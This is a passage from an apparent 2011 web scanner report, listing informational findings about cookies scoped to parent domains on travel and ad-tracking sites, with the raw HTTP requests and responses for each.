Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:34 GMT
Server: Apache
Set-Cookie: JSID=A7716E473BF556C6BB6CA1860CF34A22.p0717; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113893

<!--
JSESSIONID = A7716E473BF556C6BB6CA1860CF34A22.p0717
TPSESSIONID = T0075003076751026003112815903110013629
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var j
...[SNIP]...

13.139. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /pub/gwt/hotel/esf/NoCacheAction.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pub/gwt/hotel/esf/NoCacheAction.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617&service=TRAVELOCITY HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSID=4624190710EDB02407F82A5D5E671CC4.p0739; Domain=.travelocity.com; Path=/
ETag: W/"4888-1316720620000"
Last-Modified: Thu, 22 Sep 2011 19:43:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 4888

function esf(){var M='',nb='" for "gwt:onLoadErrorFn"',lb='" for "gwt:onPropertyErrorFn"',Y='"><\/script>',$='#',Lb='.cache.html?jsessionid='+jsessionid,ab='/',Fb='226C4CC2E5A5A4FBE9703DC949A8A7C5',Gb
...[SNIP]...

13.140. http://travela.priceline.com/sharedapps/scs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /sharedapps/scs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sharedapps/scs?val=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3&ts=1317600634270 HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:58 GMT
Server: Apache
Set-Cookie: SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; Domain=.priceline.com; Expires=Thu, 01-Dec-2011 04:59:59 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.141. http://u.openx.net/w/1.0/sc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://u.openx.net
Path:   /w/1.0/sc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/sc?r=http%3A%2F%2Fpsa-d.openx.com%2Fw%2F1.0%2Fajs%3Fauid%3D34591%26res%3D1920x1200x16%26plg%3Dswf%2Csl%2Cqt%2Cwmp%2Cshk%26ch%3DISO-8859-1%26tz%3D300%26r%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fclk%253F3%252CeAGljN9ugjAUxp-GO9L0n1hDdlHWmRCtmwkbwRuDbR2KUKwsEp9-zTC8wE5Ozvl9J9.5EIlNSYlmlEREQ4YPixgRrOZQzZhiIYzjmEA8R5hG4S1NNBcIpjxZra5b.ldiIVYj-SkY3xaj-mAc3AUA1Dp5H09XyeBk.RckFiXpM8Hv7xFrpOTwSJMpWhToPf-EEm8u6.yr3mRvvcyWF.kK6e68RetM0V2ma5kXqDjXcDM98pcwrPq-CwgP8NK3Br0rtRmA7Uw7AGUbfyyPDnSVNy2dOTpzqwIiKAxw9LCtOWmvohlCXquD51N7M67fu7LVttm3P83BuH1lnPGGi1Xe8QtnK3Hf%252C%26url%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fiframe3%253FsIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA%253D%253D%252C%252Chttp%25253A%25252F%25252Fd.tradex.openx.com%25252Fafr.php%25253Frefresh%25253D40%252526zoneid%25253D6511%252526cb%25253Dinsert_random_number_here%252526loc%25253D%252CB%25253D10%252526Z%25253D728x90%252526_salt%25253D31903434%252526r%25253D0%252526s%25253D2126909%252C659e43ce-ed51-11e0-8f45-78e7d1f5b944%252C1317599467411%26ref%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D2126909%26cb%3D53152720326%26cc%3D1 HTTP/1.1
Host: u.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D31903434%26r%3D0%26s%3D2126909,659e43ce-ed51-11e0-8f45-78e7d1f5b944,1317599467411
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; p=1317599466; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=2b443041-40a6-4c68-9457-0c205483d61d; Version=1; Expires=Mon, 01 Oct 2012 23:54:13 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
P3P: CP="CUR ADM OUR NOR STA NID"
Location: http://psa-d.openx.com/w/1.0/ajs?auid=34591&res=1920x1200x16&plg=swf,sl,qt,wmp,shk&ch=ISO-8859-1&tz=300&r=http%3A//ad.yieldmanager.com/clk%3F3%2CeAGljN9ugjAUxp-GO9L0n1hDdlHWmRCtmwkbwRuDbR2KUKwsEp9-zTC8wE5Ozvl9J9.5EIlNSYlmlEREQ4YPixgRrOZQzZhiIYzjmEA8R5hG4S1NNBcIpjxZra5b.ldiIVYj-SkY3xaj-mAc3AUA1Dp5H09XyeBk.RckFiXpM8Hv7xFrpOTwSJMpWhToPf-EEm8u6.yr3mRvvcyWF.kK6e68RetM0V2ma5kXqDjXcDM98pcwrPq-CwgP8NK3Br0rtRmA7Uw7AGUbfyyPDnSVNy2dOTpzqwIiKAxw9LCtOWmvohlCXquD51N7M67fu7LVttm3P83BuH1lnPGGi1Xe8QtnK3Hf%2C&url=http%3A//ad.yieldmanager.com/iframe3%3FsIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fd.tradex.openx.com%252Fafr.php%253Frefresh%253D40%2526zoneid%253D6511%2526cb%253Dinsert_random_number_here%2526loc%253D%2CB%253D10%2526Z%253D728x90%2526_salt%253D31903434%2526r%253D0%2526s%253D2126909%2C659e43ce-ed51-11e0-8f45-78e7d1f5b944%2C1317599467411&ref=http%3A//ad.yieldmanager.com/st%3Fad_type%3Diframe%26ad_size%3D728x90%26section%3D2126909&cb=53152720326&cc=1&mi=2b443041-40a6-4c68-9457-0c205483d61d&mn=0&mc=1
Date: Sun, 02 Oct 2011 23:54:13 GMT
Content-Length: 0
Connection: close


13.142. http://user.lucidmedia.com/clicksense/user

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=a371b4911c4e5b09&r=1 HTTP/1.1
Host: user.lucidmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=38yalGDMfLj

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:14:34 GMT
Expires: Mon, 03 Oct 2011 00:14:34 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awserh24/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Tue, 02-Oct-2012 00:14:34 GMT; Path=/
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc2JnRsPTQzMjAw&piggybackCookie=uid:3620501663059719663
Content-Length: 0
Connection: close


13.143. http://uxm.thousandeyes.com/rest/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uxm.thousandeyes.com
Path:   /rest/json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rest/json?data={%22aid%22:%2211%22,%22sid%22:%22D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408%22,%22r%22:265892,%22si%22:1,%22url%22:%22http://www.agoda.com/%22,%22ua%22:%22Mozilla/5.0%20(Windows%20NT%206.1;%20WOW64)%20AppleWebKit/535.1%20(KHTML,%20like%20Gecko)%20Chrome/14.0.835.187%20Safari/535.1%22,%22dlt%22:10244,%22clt%22:29183,%22dcl%22:37693,%22lt%22:37694,%22nt%22:0,%22rc%22:0,%22ft%22:2013,%22dt%22:0,%22ct%22:0,%22sct%22:null,%22rqt%22:2006,%22rpt%22:2,%22let%22:1,%22nl%22:1886} HTTP/1.1
Host: uxm.thousandeyes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:45 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref='/p3p/p3p.xml', CP='NOI NID HISa OTPa OUR UNRa BUS COM NAV'
Set-Cookie: _uxm_cid=D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408; Domain=.thousandeyes.com; Expires=Tue, 02-Oct-2012 00:40:45 GMT
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html

OK

13.144. http://vitamine.networldmedia.net/bts/generic14.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vitamine.networldmedia.net
Path:   /bts/generic14.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bts/generic14.php?cname=nwmhotwire&cvalue=hotelsearch HTTP/1.1
Host: vitamine.networldmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR LAW ADM DEV PSA PSD HIS OUR IND UNI"
Set-Cookie: nwmhotwire=hotelsearch; expires=Wed, 02-Nov-2011 00:41:30 GMT; path=/; domain=networldmedia.net
Vary: Accept-Encoding,User-Agent
Content-Length: 43
X-Cnection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.145. http://www.agoda.com/partners/partnersearch.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /partners/partnersearch.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/partnersearch.aspx?CkInDay=09&CkInMonth=10&CkInYear=2011&CkOutDay=16&CkOutMonth=10&CkOutYear=2011&NumberOfRooms=1&NumberOfAdults=1&NumberOfChildren=0&CityName=&CID=1444075 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:38$10-02-2012 07:38$; domain=agoda.com; expires=Wed, 03-Oct-2012 00:38:09 GMT; path=/
Date: Mon, 03 Oct 2011 00:38:08 GMT
Content-Length: 118
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/">here</a>.</h2>
</body></html>

13.146. http://www.booking.com/general.en-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /general.en-us.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/about HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.6.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=5.31764388084412

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:31:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YUFsPGDw%2F3YvsmbEMnpK9%2F5N%2B025mTgFVBfR64%2FgKzgcZwS2BG%2FpVqxxgeiiGa2Aij6eAdFCIoFktHJRCU7t6pG8eYurfp1mo97MaE6Xt3SQiUpot4wcm%2Ful3h2cCp3Aq3v9fFndje7J5kBuXpqwKFwzq1d8NFsqOMXkMLOh8MheA4SvhsDED1JW8Lzq1pPPuNWkLtLa2nYu4GrPir7OHtXIl44wyZZqW%2BoUI25Qt%2Bq%2FThnN11dNMvpllwZf%2BFUGaF0yEYQWfEUxqgLGBTcGCbPL2PoJSvzs3aJcz6peq6OJcz0X3v8XJzxlrl3Re%2B4fMPNVGOKw3OXRjD9BApu3kdB%2B4DfNedCdH7nvJIk8bHMsdAXvWaipTAaEEr77iSzcDzu0k4Pb0VGYDgJMguGhKAboI9qdT5%2FfoxQD1ZO10v0YKUwppRIyD0a3Ln9PUrxwZkhSSkHFlrAVjent8lv1qDG2xdp9lmPdV5vh3rRmuN1Lz0QN%2F3V2Sn9fPeJsHrK0pcgOYpSyW0n95GoFoyAkBhI17Phwo7yrvrjeDNHmxKMRkraR5MdqFJBuwCVd9dBvXoVyxW413W13jwOQsaHZx8iPdphluzMD5h3jwOEjlDkBpFkAF0kJZnoHDtUP3l1iRU%2FdEKfImnJ%2FQISsSKIW2wR5lSf%2F1SximqCADYBfEBvNs%2Bb4p%2BXQ0a42SQI1HuZMn7XZ3eadU1vaR0aacQEhT%2BTMbKt5QCA48TalbFf5k5egYBg9r%2B4N8uoiUgQQYx%2Ftt5AO9%2FVBRh7aJptr3L4saF02KTAh9Z0p5%2Fihhjlsn4hE28vhAsssqhO3O8S8giS%2BAD9yLu1raMti3QMcj0gfOfbUXo26HhPHD3cS56Ly4PlQzJm6UrwqCaLpO7KTYRTBFNfjq%2FicOkR6pMNZ1%2FC%2Fc0eZGJAjprFnEfcz%2Ff1D2udPGhpbVYLpVeRCyKbNt53ggYIGQr1TTkJ7xhSCCOCzTUXuE6dUGpUiWBZ7%2F3AHIMw6FvtaQBTat%2FQXE6ame41kAL%2B6V00yN0Xmopzv5yDpjigEcOO5oIMkGwsHdniwwtzhwSITaOyh2%2FKP0tbPU%2FCeKxA16ayEzJ5YKOenV4WVCjaYstXg3Le9A%2B%2BgxuR7X2ojY6dDXatodt%2F5RDf3maagBIdR6Oc6ZIKCZVYQTZjElDDZ8cp%2FgiTlLo6jDqUUyssnkr6X3M%2FAjD%2BrZNH8IuQKQM72Zu1cjPHJxdgPqO%2BOs%2F7rRh9o%2FTf5CKOGhXuc0PdC22WNwtICZpDHs8KyH%2F%2FopDWQBPuGzYzztul5MGNxkOl4zCU0jr3252eba8xA1Mw3aePG1Sf%2F8UQEgao7bg13Co2dpibytVWXIz1SXqF3vHV2vONIMhbOr0HejT8ddOxSgNDag0VIm1OAYgAbMxdRRA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:31:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59658
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...

13.147. http://www.booking.com/hotel/us/c-boston-massachusettes.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
